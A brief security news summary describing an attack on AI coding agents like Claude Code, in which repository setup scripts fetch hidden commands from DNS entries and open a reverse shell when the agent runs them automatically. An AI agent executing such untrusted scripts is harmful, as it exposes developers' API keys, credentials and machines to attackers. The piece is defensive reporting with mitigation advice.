In detail
- Attackers hide commands in DNS entries that are fetched by setup scripts at runtime – the malicious code never exists in the repository itself and remains invisible to scanners and code reviews.
- Claude Code automatically runs the setup script when an error occurs and opens a reverse shell for the attacker, who can then steal API keys, login credentials, and gain persistent access to the machine.
- A single repository link in a job posting, tutorial, or Slack message is enough to compromise any developer who opens the repo with an AI coding tool.
- Solution: AI agents should display setup scripts before execution; developers should treat third-party setup instructions as untrusted code.
Why it matters
For developers and companies using AI coding tools, this is an immediate security risk – a single click on a prepared GitHub link can lead to credential theft and loss of control over the development machine.
For you Check whether your team uses Claude Code or similar tools, and instruct developers not to automatically open GitHub repositories from unknown sources with AI agents – especially not setup scripts.